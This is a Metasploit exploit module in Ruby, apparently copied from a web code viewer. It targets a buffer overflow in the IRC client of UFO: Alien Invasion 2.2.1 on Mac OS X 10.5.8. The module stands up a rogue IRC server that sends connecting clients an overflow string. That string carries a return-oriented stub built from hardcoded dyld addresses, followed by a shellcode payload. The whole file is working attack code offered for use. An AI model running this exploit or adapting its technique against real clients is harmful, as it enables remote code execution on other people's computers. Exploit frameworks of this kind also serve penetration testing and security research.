Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::TcpServer
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name' => 'UFO: Alien Invasion IRC Client Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a buffer overflow in the IRC client component
16
        of UFO: Alien Invasion 2.2.1.
17
      },
18
      'Author'   =>
19
        [
20
          'Jason Geffner',  # Original Windows PoC Author
21
          'dookie'          # OSX Exploit Author
22
        ],
23
      'License'  => MSF_LICENSE,
24
      'References' =>
25
        [
26
          [ 'OSVDB', '65689' ],
27
          [ 'EDB', '14013' ]
28
        ],
29
      'Payload' =>
30
        {
31
          'Space' => 400,
32
          'BadChars' => "\x00\x0a\x0d",
33
          'MaxNops' => 0,
34
          'StackAdjustment' => -3500,
35
        },
36
      'Platform' => 'osx',
37
      'Targets' =>
38
        [
39
          [ 'Mac OS X 10.5.8 x86, UFOAI 2.2.1',
40
            {
41
              'Arch' => ARCH_X86,
42
              'Offset' => 524,
43
              'Writable' => 0x8fe66448,  # dyld __IMPORT
44
              # The rest of these addresses are in dyld __TEXT
45
              'setjmp' => 0x8fe1cf38,
46
              'strdup' => 0x8fe210dc,
47
              'jmp_eax' => 0x8fe01041
48
            }
49
          ]
50
        ],
51
      'DefaultTarget'  => 0,
52
      'DisclosureDate' => '2009-10-28'))
53

54
    register_options(
55
      [
56
        OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]),
57
      ])
58
  end
59

60

61
  def make_exec_payload_from_heap_stub()
62
    frag0 =
63
      "\x90" + # nop
64
      "\x58" + # pop eax
65
      "\x61" + # popa
66
      "\xc3"   # ret
67

68
    frag1 =
69
      "\x90" +             # nop
70
      "\x58" +             # pop eax
71
      "\x89\xe0" +         # mov eax, esp
72
      "\x83\xc0\x0c" +     # add eax, byte +0xc
73
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax
74
      "\xc3"               # ret
75

76
    setjmp = target['setjmp']
77
    writable = target['Writable']
78
    strdup = target['strdup']
79
    jmp_eax = target['jmp_eax']
80

81
    exec_payload_from_heap_stub =
82
      frag0 +
83
      [setjmp].pack('V') +
84
      [writable + 32, writable].pack("V2") +
85
      frag1 +
86
      "X" * 20 +
87
      [setjmp].pack('V') +
88
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +
89
      "X" * 4
90
  end
91

92

93
  def on_client_connect(client)
94

95
    print_status("Got client connection...")
96

97
    offset = target['Offset']
98

99
    buffer = "001 :"
100
    buffer << rand_text_alpha_upper(offset)
101
    buffer << make_exec_payload_from_heap_stub()
102
    buffer << make_nops(16)
103
    buffer << payload.encoded
104
    buffer << "\x0d\x0a"
105

106
    print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")
107
    client.put(buffer)
108

109
  end
110
end
111

112